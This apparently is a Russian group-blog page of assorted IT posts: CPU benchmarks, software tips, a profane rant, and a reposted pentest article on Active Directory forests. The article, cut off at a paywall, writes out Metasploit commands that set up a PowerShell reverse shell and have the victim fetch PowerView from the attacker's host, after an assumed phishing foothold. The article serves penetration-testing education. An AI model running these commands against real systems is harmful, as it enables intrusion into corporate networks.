-Музыка

 -Поиск по дневнику

Поиск сообщений в it_is_it

 -Подписка по e-mail

 

 -Статистика

Статистика LiveInternet.ru: показано количество хитов и посетителей
Создан: 17.08.2005
Записей: 347
Комментариев: 103
Написано: 508




Записи содержат ненормативную лексику! Описание того, что я делаю на работе.


#курсы

Среда, 13 Января 2016 г. 12:46 + в цитатник

#курсы

Суббота, 09 Января 2016 г. 07:26 + в цитатник

про АД из хакера

Суббота, 09 Января 2016 г. 02:17 + в цитатник
Reeder (it_is_it) все записи автора Active Directory — явление, довольно часто встречающееся при тестировании безопасности крупных компаний. Нередко попадается не одинокий домен в единственном лесу, а более ветвистая и более интереcная структура. Поэтому сегодня мы поговорим о том, как проводить разведку, изучать структуру леса, рассмотрим возможности поднятия привилегий. А завершим полной компрометацией всего леса предприятия!


О чем на этот раз

Не секрет, что многие, если не большинство крупных компаний используют службу каталогов Active Directory от небезызвестной MS. Причина достаточно очевидна. Такой подход позволяет многие вeщи автоматизировать, интегрировать все в одну слаженную структуру и облегчить жизнь как IT-отделу, так и всем сотрудникам.

Как правило, если организация довольно большая, то, развиваясь, она может приобретать другие (более мелкие) компании, устраивать слияния, расширения и прочие радости крупного бизнеса. Все это сказывается на структуре леса AD, который пополняется новыми деревьями и разрастается вширь и вглубь. Именно о такой разветвленной структуре мы и будем разговаривать. А начнем, по традиции, с небольшого теоретического введения.


В дремучих лесах AD

Бегло рассмотрим ключевые понятия Active Directory, которые постоянно будут использоваться в дальнейшем. Начнем от наименьшей структурной единицы AD — домена.

Доменом можно назвать логическую группу (пользователей, хостов, серверов и так далее), которые поддерживают централизованное администрирование.

Деревом называется набор доменов, которые используют общее пространство имен (по аналогии с обычным DNS). Важно, что дочерний домен автoматически получает двухсторонние доверительные отношения с родительским доменом.

Доверие — это своеобразное соглашение между двумя доменами, устанавливающее разрешения на доступ к тем или иным объектам или ресурсам.

Ну а лес, в свою очередь, является наиболее крупной структурой в Active Directory и объединяет все деревья. В результате все деревья в лесу обычно объединены двунаправленными доверительными отношениями, что позволяет пользователям в любом дереве получать доступ к ресурсам в любом другом, если они имеют соответствующие разрешения и права.

По умолчанию первый домен, создаваемый в лесу, автоматически становится его корневым доменом.

Завершив теоретический экскурс, можно переходить к практике, чем и займемся. При этом мы будем предполагать, что уже получен базовый доступ с небольшими пользовательскими привилегиями. Допустим, что социнженерия дала свои плоды и после отправки специально сформированного письма (например, с документом во вложении) кто-то открыл документ и мы получили шелл.


Проверяем боекомплект

Перед любыми боевыми действиями неплохо вначале осмотреть свой инструментарий и определиться, что будет использовaться. Для изучения Windows-окружения самый удобный инструмент на сегодняшний день — это PowerShell. Почему? Да потому, что он везде установлен (начиная с Windows 7/2008R2), позволяет работать и выполнять разнообразные командлеты рядовым пользователям и глубоко интегрирован в ОС.

Дефолтная политика, которая запрещает выполнение сторонних (неподписанных) PowerShell-скриптов, не является серьезной защитной мерой. Это просто защита от случайного запуска по двойному клику и очень легко обходится. По большому счету PowerShell — это целый фреймворк для постэксплуатации Windows. Естественно, по этой причине пентестеры уже несколько лет активно его используют, и написано множество различных модулей (скриптов), которые помогают автоматизировать те или иные действия.

Мы будем использовать лишь один такой модуль — PowerView, который входит в набор PowerTools. Изначально он создавался в рамках известного проекта Veil, но не так давно, после выхода впечатляющего фреймворка PowerShell Empire (который очень динамично развивается и требует отдельного рассмотрения), был перемещен и теперь является подпроектом PS Empire.

PowerView служит одновременно и заменой всех консольных net*-команд в Windows, и средством изучения AD. Отдельно стоит еще раз подчеркнуть, что большинство возможностей доступны с правами обычного пользователя.


Выдвигаемся на исходную

Напомню, что базовый доступ у нас уже есть, и для упрощения будем считать, что у нас есть шелл Meterpreter с правами рядового доменного пользователя. В этом году работа с PS в Метасплоите стала значительно удобнее, появилось несколько специализированных пейлоадов, чем и воспользуемся. Чтобы не потерять имеющуюся сессию, создадим новую, используя механизм payload_inject.

Для этого выполняем:
msf > use exploit/windows/local/payload_inject

В качестве полезной нагрузки, конечно же, выбираем powershell:
msf exploit(payload_inject) > set PAYLOAD windows/powershell_reverse_tcp

Теперь можно сразу указать модуль, который нужно импортировать в случае успешного запуска:
msf exploit(payload_inject) > set LOAD_MODULES http://10.54.0.181/powerview.ps1

Отмечу, что при желании можно даже указывать полный адрес до GitHub, в нашем случае PowerView будет скачиваться жертвой прямо с хоста атакующего.

Последним штрихом необходимо указать номер уже имеющейся сессии:
msf exploit(payload_inject) > set SESSION 1

Запускаем на выполнение (результат на рис. 1).

Рис. 1. PowerShell-сессия
Рис. 1. PowerShell-сессия


Ситуационная осведомленность

Теперь, когда у нас есть интерактивный PowerShell, можно внимательно изучить обстановку. Первым делом пригодятся две следующие команды:



Продолжение статьи доступно подписчикам

сжатый воздух в качестве аккумулятора

Пятница, 08 Января 2016 г. 23:59 + в цитатник
Reeder (it_is_it) все записи автора чтото я не уловил надро ещё раз посмотреть
http://www.cnbc.com/2015/01/09/a-lot-of-hot-air-why-energy-storage-matters.html

Запретить сайтам отключать меню правой кнопки мыши

Пятница, 08 Января 2016 г. 03:22 + в цитатник
095 (it_is_it) все записи автора В Firefox :

открываем новую вкладку, в адресной строке пишем: about:config
Жмём Enter, соглашаемся быть осторожными,
в появившейся строке поиска вбиваем: dom.event.contextmenu.enabled
если значение true, кликаем дважды по dom.event.contextmenu.enabled -> значение изменяется на false
- всё, теперь можете копировать защищёные картинки и прочий контент с сайта. )

http://forum.mozilla-russia.org/viewtopic.php?id=36226



Процитировано 1 раз

,kz!

Понедельник, 04 Января 2016 г. 20:35 + в цитатник

f[etnm//

Понедельник, 04 Января 2016 г. 17:43 + в цитатник

программа связь между клавишами и компом

Суббота, 02 Января 2016 г. 15:51 + в цитатник
Reeder (it_is_it) все записи автора KaraKEYoke Karaoke - программа для караоке и обучения игре на синтезаторе, МИДИ клавиатуре, пианино, фортепьяно

KaraKEYoke main screen

Вместе с KaraKEYoke Вы сможете не только петь свои любимые песни, но и легко научиться играть их, даже не изучая нот!

Для караоке или обучения можно загрузить любые МИДИ или караоке файлы для компьютера (*.mid, *.kar). Это могут быть песни, мелодии, упражнения, пьесы, этюды, которые легко найти и скачать в Интернете. Программа показывает нотную запись (нотный стан, музыкальную нотацию, партитуру).

Вы можете выбрать фрагмент любимой песни и быстро научиться играть на синтезаторе/MIDI клавиатуре этот фрагмент. Несколько режимов обучения подойдут для любого уровня, для детей, начинающих, для тех, кто не знает нот и не играл на клавишных инструментах раньше. Для обучения нужно подключить к компьютеру любой синтезатор, цифровое пианино, фортепиано или МИДИ клавиатуру. Обучающая программа КараКЕЙоке будет показывать Вам какие клавиши нужно нажимать и терпеливо ждать, когда Вы их правильно нажмёте. Если синтезатор имеет функцию подсветки клавиш (Casio LK серия), то нужные клавиши будут подсвечиваться прямо на нём.

Иногда для пения караоке необходимо усилить партию соло, чтобы получить хорошую опору для голоса. Для этого МИДИ и караоке плеер КараКЕЙоке позволяет выбрать нужный MIDI канал, поднять его громкость и сменить инструмент на более выразительный. Можно транспонировать ноты по октавам или изменять тональность всей композиции. Для КАРАОКЕ этот проигрыватель караоке можно использовать бесплатно.

Многие синтезаторы и цифровые пианино Casio LK-, CTK-, WK-, ... позволяют загружать в них специальные МИДИ файлы с песнями, например используя SD карту памяти. Такие файлы трудно найти, ведь синтезатор использует свой специальный формат SMF0. Теперь Вам не нужен конвертор, чтобы конвертировать MIDI и караоке файлы в SMF-0 формат, ведь программа КараКЕЙоке умеет сразу проигрывать песни на синтезаторе, и поддерживает множество настроек и режимов обучения.

Возможно программа КараКЕЙоке это хороший подарок для тех, кто не только любит петь караоке, но хочет получить дополнительное удовольствие от погружения в мир музыки, а может быть в дальнейшем начать серьёзное её изучение в музыкальной школе или с преподавателем, погрузившись в сольфеджио, арпеджио, аккомпанемент, ноты, аккорды, транспозиции, гаммы, сильные и слабые доли, размеры, легато, стаккато, паузы, фразы, партии, партируры, интервалы, мажорные и минорные тональности :)

В этом ролике робот Джонни учится играть на синтезаторе CASIO LK-270 с помощью программы KaraKEYoke.
http://karakeyoke.ru/software/karakeyoke/overview.html


Понравилось: 1 пользователю

Сети, связь - сильно быстрее и дешевле

Пятница, 01 Января 2016 г. 16:57 + в цитатник

rutor

Вторник, 29 Декабря 2015 г. 22:17 + в цитатник
095 (it_is_it) все записи автора // .. зайти на rutor можно только используя специальные средства, такие как АнтиЗапрет и AntiCenz. Ну и, конечно же, сайты доступны в Tor и I2P.

Загрузочные флешки и софт к ним

Четверг, 24 Декабря 2015 г. 22:11 + в цитатник
095 (it_is_it) все записи автора http://habrahabr.ru/post/240443/ - зри в коммент
http://remontka.pro/best-free-software/ - программы на каждый день
http://kolibrios.org/ru/index - Kolibri
http://habrahabr.ru/post/234443/ - Запуск VMWare образов на Zalman VE-300

CopyMik

Среда, 16 Декабря 2015 г. 13:48 + в цитатник
095 (it_is_it) все записи автора CopyMik - бесплатная программа для сложного копирования, переименования (включая транслитерацию), сжатия, разжатия, шифрования, дешифрования файлов и папок.

В отличии от robocopy и xcopy программа CopyMik имеет переименование, сжатие и шифрацию,
позволяет использовать несколько масок в каждом ключе.
Ключи разделены для файлов и папок.
Это позволяет, в большинстве случаев, отказаться от написания скриптов копирования.
CopyMik удобна при создании резервный копий, зеркальном отображении файлов с повторением структуры папок (дирректорий).
Позволяет исключить из копирования или переименовать в случае существования папки и файлы.
Поддерживает копирование прав доступа к файлам и папкам раздельно.
При копировании файлов возможно их шифрование или дешифровка, сжатие и разжатие, опционально шифруемые и сжимаемые файлы можно переименовывать как в прямом так и в обратном направлениях.
Доступно 12 различных алгоритмов шифрования что делает возможным последовательное шифрование несколькими различными алгоритмами (маниакальное шифрование), а это в свою очередь очень сильно затрудняет взлом и дешифровку.
Содержит много других удобных возможностей.
CopyMik 2.8 Beta Сборка 5 (Бесплатная)для Windows
rusmikleАТgmail.com Михаил Червоненко 2015
Последнее обновление: - 06.12.2015 22:30 (Germany)

Загрузить zip файл  |  Зеркало - Softodrom.ru
[/b]
http://superbasis.de/copymik/index.htm#rus

http://soft.softodrom.ru/ap/CopyMik-p25454

http://forum.ru-board.com/topic.cgi?forum=5&topic=48207

http://www.itsec.ru/forum.php?sub=11248&from=-1

ПО для резервного копирования:
https://ru.wikipedia.org/w/index.php?title=%D0%A1%...%B8%D1%8F&stable=0&redirect=no

Читать далее...

Метки:  

Vivaldi - Новый веб-браузер

Среда, 16 Декабря 2015 г. 12:45 + в цитатник

WinMerge

Среда, 16 Декабря 2015 г. 12:39 + в цитатник
095 (it_is_it) все записи автора Обзор инструментов для визуального сравнения папок и файлов и разрешения конфликтов слияния:
http://habrahabr.ru/post/150001/
-----------------------------------------------------------------------------------
WinMerge является Open Source инструментом сравнения и слияния для Windows. WinMerge может сравнивать как файлы, так и папки, отображая различия в визуальной текстовой форме, которые легко понять и обработать: http://winmerge.org/
WinMerge 2.14.0
-----------------------------------------------------------------------------------
WinMerge — свободное ПО с открытым исходным кодом для сравнения и синхронизации файлов и директорий, распространяемое на условиях лицензии GNU GPL для Microsoft Windows.
Основные возможности: https://ru.wikipedia.org/wiki/Winmerge
+
http://www.hardforum.ru/t81274-2/
-----------------------------------------------------------------------------------

Метки:  

Как отключить предложение обновиться до Windows 10

Среда, 16 Декабря 2015 г. 12:12 + в цитатник
095 (it_is_it) все записи автора "Если у вас Windows 7, то необходимо искать в списке обновления KB3035583, KB2952664, KB3021917.

Если у вас Windows 8, то необходимо искать в списке обновления KB3035583, KB2976978.

После удаления этих обновлений их вам снова предложат установить, для этого их нужно просто скрыть и всё.

Список обновлений:
KB:3021917
KB:2990214
KB:3050265
KB:2952664
KB:2977759
KB:3046480
KB:3035583

KB:3065987
KB:3075851
KB:3083324
KB:3112343
KB:3083710
----------------------
в моем случае достаточно было удалить KB3035583, обязательно потом его надо скрыть (правой кнопкой мыши по обновлению в списке - скрыть обновление), если после удаления его нет в списке - выполнить поиск новых обновлений, должно появится, потом скрыть."
----------------------
GWX Control Panel - удобное решение для пользователей операционок семейства Windows 7 и 8, с помощью которого очень легко избавиться от системного оповещения о получении Windows 10
https://yandex.ru/yandsearch?&clid=2186623&text=GWX%20Control%20Panel

FlashFolder

Среда, 16 Декабря 2015 г. 12:09 + в цитатник
095 (it_is_it) все записи автора Суть проблемы:
В Windows слишком мало возможностей для того, чтобы в процессе сохранения файла быстро найти нужную папку: https://glashkoff.com/obzor/flashfolder/

Программа абсолютно бесплатна. Можно устанавливать на рабочие компьютеры - лицензия GPLv2 разрешает.


Скачать
Версия для 32-битных операционных систем — ссылка (зеркало).


Версия для 64-битных операционных систем — ссылка (зеркало).


Официальный сайт программы здесь, но оттуда FlashFolder лучше не брать - там устаревшая версия, не работающая в Windows 7 и 8. Благодаря стараниям программиста Tim De Baets нам доступна исправленная версия FlashFolder, ссылки на которую приведены выше.


+
http://useful-faq.livejournal.com/19140492.html

Метки:  

Java-задолбала!!!!

Среда, 16 Декабря 2015 г. 00:27 + в цитатник
Gorely (it_is_it) все записи автора

всего навсего полгода назад довольно старый принт-сервер от НР через вэбморду позволял пользовать сканер от 1100а, и вот блядь когда эта прелестная функция в очредной раз в полгода понадобилась выясняется что Chrome уже вообще ее нахуй не поддерживает, а сама эта блядская ява просто не отображает интерфейс принтсервера!!!! и че бля - выкидывать полностью работающее устройство только потому что какие то пидары выкинули поддерждку старого кода? а с какого хуя вы ее выкинули? вы блядь место на дискете экономите????

сцуки


что поменялось с процами

Вторник, 15 Декабря 2015 г. 14:46 + в цитатник
Reeder (it_is_it) все записи автора

Intel Core i7 пяти поколений в близком частотном диапазоне

 

 

Топовые процессоры трех последних поколений микроархитектур Intel мы тестировали уже и as is, и с дискретной видеокартой, однако эти два материала, как нам кажется, все еще недостаточны для полного раскрытия темы. Первым «тонким моментом» являются тактовые частоты — все-таки при выпуске Haswell Refresh компания уже разделила жестко линейку «обычных» Core i7 и «оверклокерских», фабрично разогнав последние (что было не так уж и сложно, поскольку таких процессоров вообще говоря требуется немного, так что отобрать необходимое количество нужных кристаллов несложно). Появление же Skylake положение дел не только сохранило, но и усугубило: Core i7-6700 и i7-6700K это вообще очень разные процессоры, различающиеся и уровнем TDP. Таким образом, даже при одинаковых частотах эти модели могли бы работать по-разному с точки зрения производительности, а ведь и частоты совсем не одинаковые. В общем, делать выводы по старшей модели опасно, но в основном-то как раз везде изучалась она и только она. «Младшая» (и более востребованная) до последнего времени вниманием тестовых лабораторий избалована не была.

А для чего это может быть нужно? Как раз для сравнения с «верхушками» предыдущих семейств, тем более что там обычно такого большого разброса частот не было. Иногда и вообще не было — например, пары 2600/2600K и 4771/4770К в плане процессорной части в штатном режиме идентичны. Понятно, что 6700 в большей степени является аналогом не названных моделей, а 2600S, 3770S, 4770S и 4790S, но... Важно это лишь с технической точки зрения, которая, в общем-то, мало кого интересует. В плане распространенности, легкости приобретения и других значимых (в отличие от технических деталей) характеристик это как раз «регулярное» семейство, к которому и будет присматриваться большинство владельцев «старых» Core i7. Или потенциальных владельцев — пока еще апгрейд временами остается чем-то полезным, большинство пользователей процессоров младших семейств процессоров при необходимости увеличения производительности присматривается в первую очередь к устройствам для уже имеющейся «на руках» платформы, а только потом уже рассматривает (или не рассматривает) идею ее замены. Правильный это подход или не очень — покажут тесты.

Конфигурация тестовых стендов

Процессор Intel Core i7-2700K Intel Core i7-3770 Intel Core i7-4770K Intel Core i7-5775C Intel Core i7-6700
Название ядра Sandy Bridge Ivy Bridge Haswell Broadwell Skylake
Технология пр-ва 32 нм 22 нм 22 нм 14 нм 14 нм
Частота ядра std/max, ГГц 3,5/3,9 3,4/3,9 3,5/3,9 3,3/3,7 3,4/4,0
Кол-во ядер/потоков 4/8 4/8 4/8 4/8 4/8
Кэш L1 (сумм.), I/D, КБ 128/128 128/128 128/128 128/128 128/128
Кэш L2, КБ 4×256 4×256 4×256 4×256 4×256
Кэш L3 (L4), МиБ 8 8 8 6 (128) 8
Оперативная память 2×DDR3-1333 2×DDR3-1600 2×DDR3-1600 2×DDR3-1600 2×DDR4-2133
TDP, Вт 95 77 84 65 65
Графика HDG 3000 HDG 4000 HDG 4600 IPG 6200 HDG 530
Кол-во EU 12 16 20 48 24
Частота std/max, МГц 850/1350 650/1150 350/1250 300/1150 350/1150
Цена 18747 руб. (4) 26027 руб. (10) 28440 руб. (158) 30220 руб. (68) 30990 руб. (51)

Для пущей академичности имело бы смысл тестировать Core i7-2600 и i7-4790, а вовсе не 2700К и 4770К, но первый в наше время найти уже сложно, в то время как 2700К у нас под рукой в свое время нашелся и был протестирован. Равно как и 4770К тоже изучался, причем в «обычном» семействе он имеет полный (4771) и близкий (4770) аналоги, и вся упомянутая троица от 4790 отличается несущественно, так что возможностью минимизировать количество работы мы решили не пренебрегать. В итоге, кстати, процессоры Core второго, третьего и четвертого поколений оказались максимально близки друг к другу по официальному диапазону тактовых частот, да и 6700 отличается от них незначительно. Broadwell тоже можно было «подтянуть» к этому уровню, взяв результаты не i7-5775C, а Xeon E3-1285 v4, но только лишь подтянуть, а не полностью устранить различие. Именно поэтому мы решили воспользоваться более массовым (благо и большинство других участников такие же), а не экзотическим процессором.

Что касается прочих условий тестирования, то они были равными, но не одинаковыми: частота работы оперативной памяти была максимальной поддерживаемой по спецификациям. А вот ее объем (8 ГБ) и системный накопитель (Toshiba THNSNH256GMCT емкостью 256 ГБ) были одинаковыми для всех испытуемых.

Методика тестирования

Для оценки производительности мы использовали нашу методику измерения производительности с применением бенчмарков iXBT Application Benchmark 2015 и iXBT Game Benchmark 2015. Все результаты тестирования в первом бенчмарке мы нормировали относительно результатов референсной системы, которая в этом году будет одинаковой и для ноутбуков, и для всех остальных компьютеров, что призвано облегчить читателям нелегкий труд сравнения и выбора:

Процессор Intel Core i5-3317U
Чипсет Intel HM77 Express
Память 4 ГБ DDR3-1600 (двухканальный режим)
Графическая подсистема Intel HD Graphics 4000
Накопитель SSD 128 ГБ Crucial M4-CT128M4SSD1
Операционная система Windows 8 (64-битная)
Версия видеодрайвера графического ядра Intel 9.18.10.3186

iXBT Application Benchmark 2015

Как мы уже не раз писали, в этой группе немалое значение имеет видеоядро. Однако далеко не все так просто, как можно было бы предположить только лишь по техническим характеристикам — например, i7-5775C все же медленнее, чем i7-6700, хотя у первого как раз GPU намного мощнее. Впрочем, еще более показательно тут сравнение 2700К и 3770, которые в плане исполнения OpenCL-кода различаются принципиально — первый задействовать для этого GPU вообще не способен. Второй — способен. Но делает это настолько медленно, что никаких преимуществ перед предшественником не имеет. С другой стороны, наделение такими способностями «самого массового GPU на рынке» привело к тому, что их начали понемногу использовать производители программного обеспечения, что проявилось уже к моменту выхода на рынок следующих поколений Core. И наряду с небольшими улучшениями и процессорных ядер способно привести к достаточно заметному эффекту.

Однако не везде — вот как раз случай, когда прирост от поколения к поколению совсем не заметен. Впрочем, он есть, но такой, что проще не обращать на него внимания. Интересным тут является разве что то, что прошедший год позволил совместить такое увеличение производительности с существенно менее жесткими требованиями к системе охлаждения (что открывает обычным настольным Core i7 и сегмент компактных систем), однако не во всех случаях это актуально.

А вот пример, когда на GPU уже удалось переложить немалую часть нагрузки. Единственное, что может «спасти» в этом случае старые Core i7 это дискретная видеокарта, однако пересылки данных по шине эффект портят, так что i7-2700K и в этом случае не обязательно догонит i7-6700, а 3770 на это способен, но вот угнаться ни за 4790К или 6700К, ни за 5775С с любым видео уже не может. Собственно, ответ на иногда возникающий у части пользователей недоуменный вопрос — зачем в Intel уделяют столько внимания интегрированной графике, если для игр ее все равно мало, а для других целей давно достаточно? Как видим, не слишком-то и «достаточно», если самым быстрым иногда способен (как здесь) оказаться процессор с далеко не самой мощной «процессорной» частью. И уже заранее интересно — что мы сможем получить от Skylake в модификации GT4e ;)

Поразительное единодушье, обеспеченное тем, что этой программе не требуются ни новые наборы инструкций, ни какие-то чудеса на ниве увеличения многопоточной производительности. Небольшая разница между поколениями процессоров, все же, есть. Но выискивать ее можно разве что при в точности идентичной тактовой частоте. А когда таковая различается существенно (что мы имеем в исполнении i7-5775С, в однопоточном режиме отстающем от всех на 10%) — можно и не искать :)

Audition «умеет» более-менее все. Разве что к дополнительным потокам вычисления довольно равнодушен, но использовать их умеет. Причем, судя по результатам, на Skylake делает это лучше, чем было свойственно предыдущим архитектурам: преимущество 4770К над 4690К составляет порядка 15%, а вот 6700 обходит 6600К уже на 20% (при том, что частоты у всех примерно равные). В общем, скорее всего, в новой архитектуре будет ждать нас еще немало открытий. Небольших, но иногда дающих кумулятивный эффект.

Как и в случае распознавания текста, где именно 6700 отрывается от предшественников наиболее «резво». Хоть в абсолютном итоге и незначительно, но ждать на относительно старых и хорошо «вылизанных» алгоритмах такого прироста при учете того, что, по сути, перед нами энергоэффективный процессор (кстати — 6700К действительно намного быстрее справляется с этой задачей) априори было бы слишком оптимистично. Мы и не ждали. А практика оказалась интереснее априорных предположений :)

С архиваторами все топовые процессоры справляются очень хорошо независимо от поколения. Во многом, как нам кажется, потому, что для них-то эта задача уж очень уже простая. Собственно, счет уже идет на секунды, так что что-то здесь радикально улучшить практически невозможно. Если только ускорить работу системы памяти, но DDR4 имеет более высокие задержки, нежели DDR3, так что гарантированный результат дает разве что увеличение кэшей. Поэтому самым быстрым оказался единственный среди протестированных процессор с GPU GT3e — кэш-память четвертого уровня используется не только видеоядром. С другой стороны, не так уж и велик прирост от дополнительного кристалла, так что архиваторы просто та нагрузка, на которую в случае заведомо быстрых систем (а не каких-нибудь мини-ПК) можно уже не обращать внимания.

Плюс-минус пол-лаптя от Солнца, что, в общем, тоже подтверждает, что все топовые процессоры справляются с такими задачами одинаково, контроллеры в чипсетах трех серий примерно идентичные, так что существенная разница может быть обусловлена только накопителем.

А вот в таком банальном сценарии, как простое копирование файлов, еще и теплопакетом: модели с пониженным «разгоняются» достаточно вяло (благо формально и не за чем), что приводит к чуть более низким результатам, чем могло бы. Но в целом тоже не тот случай, ради которого может возникнуть желание менять платформу.

Что получаем в итоге? Все процессоры примерно идентичны друг другу. Да, конечно, разница между лучшим и худшим превышает 10%, но не стоит забывать о том, что это различия, накопившиеся за три с лишним года (а возьми мы i7-2600, так было бы 15% почти за пять). Таким образом, практического смысла в замене одной платформы на другую нет, пока старая работает. Естественно, если речь идет о LGA1155 и ее последователях — как мы уже убедились«перепад» между LGA1156 и LGA1155 куда более заметный, причем не только в плане производительности. На последних на данный момент платформах Intel что-то можно «выжать» использованием «стероидных» Core i7 (если уж все равно ориентироваться именно на это недешевое семейство), но не так и много: по интегральной производительности i7-6700K обгоняет i7-6700 на 15%, так что и его отрыв от какого-нибудь i7-2700K увеличивается почти до 30%, что уже более весомо, но все равно еще не принципиально.

Игровые приложения

По понятным причинам, для компьютерных систем такого уровня мы ограничиваемся режимом минимального качества, причем не только в «полном» разрешении, но и с его уменьшением до 1366×768: Несмотря на очевидный прогресс в области интегрированной графики, она пока не способна удовлетворить требовательного к качеству картинки геймера. А 2700К мы решили и вовсе на стандартном игровом наборе не проверять: очевидно, что тех его владельцев, кто использует именно интегрированное видеоядро, игры не интересуют от слова совсем. Кого интересуют хоть как-то, те уж точно как минимум какую-нибудь «затычку для слота» в закромах нашли и установили, благо наше тестирование по предыдущей версии методикипоказало, что HD Graphics 3000 не лучше, чем даже Radeon HD 6450, причем обоих практически ни на что не хватает. Вот HDG 4000 и более новые IGP уже какой-никакой интерес собой представляют.

Вот, например, в Aliens vs. Predator можно поиграть на любом из изучаемых процессоре, но только снизив разрешение. Для FHD же подходит только GT3e, причем неважно какой — просто в сокетном исполнении такая конфигурация на данный момент доступна лишь для Broadwell со всеми вытекающими.

Зато «танчики» на минималках уже на всем «бегают» столь хорошо, что стройная картина только в высоком разрешении и «вытанцовывается»: в низком даже непонятно — кто лучше, а кто хуже.

Grid2 при всей своей слабой требовательности к видеочасти все еще ставит процессоры строго по ранжиру. Но особенно хорошо это видно опять в FHD, где и пропускная способность памяти уже имеет значение. В итоге на i7-6700 уже можно разрешение не снижать. На i7-5775C тем более, причем и абсолютные результаты намного выше, так что если данная сфера применения интересует, а использование дискретной видеокарты по каким-либо причинам нежелательно, альтернатив этой линейке процессоров по-прежнему нет. В чем нет и ничего нового.

Лишь старшие Haswell «вытягивают» игру хотя бы в низком разрешении, а Skylake делает это уже без оговорок. Broadwell не комментируем — это не архитектурное, а, скажем так, количественное превосходство.

Более старая игра серии на первый взгляд аналогична, но тут уже и между Haswell и Skylake даже количественных отличий не наблюдается.

В Hitman — наблюдаются и заметные, но перехода количества в качество по-прежнему нет.

Как и здесь, где даже режим низкого разрешения может «вытянуть» только процессор с GT3e. У остальных — весомый, но все еще недостаточный даже для таких «подвигов» прогресс.

Минимальный режим настроек в этой игре относится очень щадящим образом ко всем слабосильным GPU, хотя HDG 4000 еще «хватало» лишь на HD, но не FHD.

И снова тяжелый случай. Менее «тяжелый», чем Thief, но достаточный для того, чтобы продемонстрировать наглядно, что никакая интегрированная графика не может считаться игровым решением.

Хотя в некоторые игры может позволить поиграть и с относительным комфортом. Впрочем, ощутимым только если усложнять IGP и количественно наращивать все функциональные блоки. Собственно, как раз в легких режимах прогресс в области GPU Intel наиболее заметен — примерно два раза за три года (более старые-то разработки вообще уже нет смысла рассматривать серьезно). Но из этого не следует, что со временем интегрированная графика сможет легко и непринужденно догнать дискретную сравнимого возраста. Скорее всего, «паритет» будет установлен с другой стороны — имея в виду огромную базу инсталлированных решений невысокой производительности, производители тех же игр на нее и будут ориентироваться. Почему раньше этого не делали? Вообще говоря, делали — если рассматривать не только 3D-игры, а вообще рынок, огромное количество весьма популярных игровых проектов было предназначено как раз для того, чтобы нормально работать и на достаточно архаичных платформах. Но определенный сегмент программ, «двигавших рынок» был всегда, причем именно он и привлекал максимум внимания со стороны прессы и не только. Сейчас же процесс явно близок к точке насыщения, поскольку, во-первых, парк разнообразной компьютерной техники уже очень велик, и желающих заниматься перманентным апгрейдом все меньше. А во-вторых, «мультиплатформенность» нынче подразумевает под собой не только специализированные игровые консоли, но и разнообразные планшеты-смартфоны, где, очевидно, с производительностью все еще хуже, чем у «взрослых» компьютеров, независимо от степени интегрированности платформ последних. Но для того, чтобы данная тенденция стала преобладающей, нужно, все же, как нам кажется достигнуть определенного уровня гарантированной производительности. Чего пока нет. Но над проблемой все производители работают более чем активно и Intel тут исключением не является.

Итого

Что же мы видим в конечном итоге? В принципе, как не раз было сказано, последнее существенное изменение в процессорных ядрах семейства Core состоялось почти пять лет назад. На этом этапе уже удалось достичь такого уровня, «атаковать» который напрямую никто из конкурентов не может. Поэтому основной задачей Intel является улучшение положения в, скажем так, сопутствующих областях, а также наращивание количественных (но не качественных) показателей там, где это имеет смысл. Тем более, что серьезное влияние на массовый рынок оказывает растущая популярность портативных компьютеров, давно обогнавших по этому показателю настольные и становящихся все более портативными (несколько лет назад, например, ноутбук массой 2 кг еще считался «условно легким», а сейчас активно растут продажи трансформеров, в случае которых большая масса убивает весь смысл их существования). В общем, разработка компьютерных платформ давно идет не по пути наилучшего удовлетворения потребностей покупателей больших настольных компьютеров. В лучшем случае — не в ущерб им. Поэтому то, что в целом в этом сегменте производительность систем не снижается, а даже немного растет, уже повод для радости — могло быть и хуже :) Плохо только то, что из-за изменений в периферийной функциональности приходится постоянно менять и сами платформы: это сильно подкашивает такое традиционное преимущество модульных компьютеров, как ремонтопригодность, но здесь ничего не попишешь — попытки сохранять совместимость любой ценой до добра тем более не доводят (сомневающиеся могут посмотреть на, к примеру, AMD AM3+).


облачная коммуникация

Вторник, 15 Декабря 2015 г. 14:45 + в цитатник
Reeder (it_is_it) все записи автора

Облачные сервисы NEC Univerge Blue предназначены для удовлетворения потребностей бизнеса в коммуникациях

Компания NEC представила Univerge Blue Business Cloud Services — набор облачных сервисов, нацеленных на удовлетворение растущих потребностей предприятий в коммуникациях. Основными критериями, заложенными при проектировании Univerge Blue, по словам производителя, были безопасность и постоянная доступность. Унифицированная платформа обеспечивает голосовую связь, мобильное подключение, обмен сообщениями, телеприсутствие, web-конференции и другие услуги.

Переход к облачным сервисам UCaaS привлекателен из-за снижения затрат и повышения гибкости

Как утверждается, переход к облачным сервисам привлекателен из-за снижения затрат и повышения гибкости. Особенно новая технология востребована в случае компаний с несколькими офисами, расположенными в нескольких местах.

Разработчик отмечает, что архитектура Univerge Blue характеризуется целостностью, включая как инфраструктурные уровни, так и уровень приложений. В свою очередь, Univerge Blue является частью более крупного решения, предлагаемого NEC и состоящего из серверов NEC Fault Tolerance, программно-определяемых сетей (SDN), ПО и вычислительных центров.

Доступность сервисов Univerge Blue производитель оценивает в 99,999%. Защита информации обеспечивается шифрованием. Сервисы могут быть развернуты как приватные, гибридные или общедоступные.

Отметим, что предложение NEC является частью растущего рынка унифицированных средств связи, доступных как сервисы (unified communications as a service, UCaaS). Средства UCaaS являются конкурентами традиционных решений, опирающихся на использование оборудования, которым располагает потребитель. Аналитики ожидают, что в ближайшие годы рынок UCaaS будет расти в несколько раз быстрее рынка традиционных решений.

Источник: NEC


игры для йуных погромистов

Вторник, 15 Декабря 2015 г. 14:43 + в цитатник
Reeder (it_is_it) все записи автора

Игры, которые учат программированию

IrinaInina 13 декабря в 16:13 34006


Образование стоит дорого. Хорошее образование стоит очень дорого. Но тем не менее возможность получить бесплатное и качественное образование есть у каждого. Компании и корпорации во всём мире вкладывают деньги в создание бесплатных образовательных продуктов. Отчасти, чтобы обеспечить себя квалифицированными кадрами в будущем. Отчасти, для преодоления бедности, предоставления всем равного доступ к качественному образованию. 

У каждого есть возможность воспользоваться специально созданной для обучения школьников средой программирования Scratch, которую разрабатывают специалисты одного из самых престижных технических учебных заведений США и мира — Массачусетского технологического института. Или игрой Minecraft, за которую Microsoft год назад заплатила $2,5 млрд и с помощью которой, в том числе, планирует обучать детей программированию. Или обучающими играми, которые создают энтузиасты и добровольцы во всём мире.

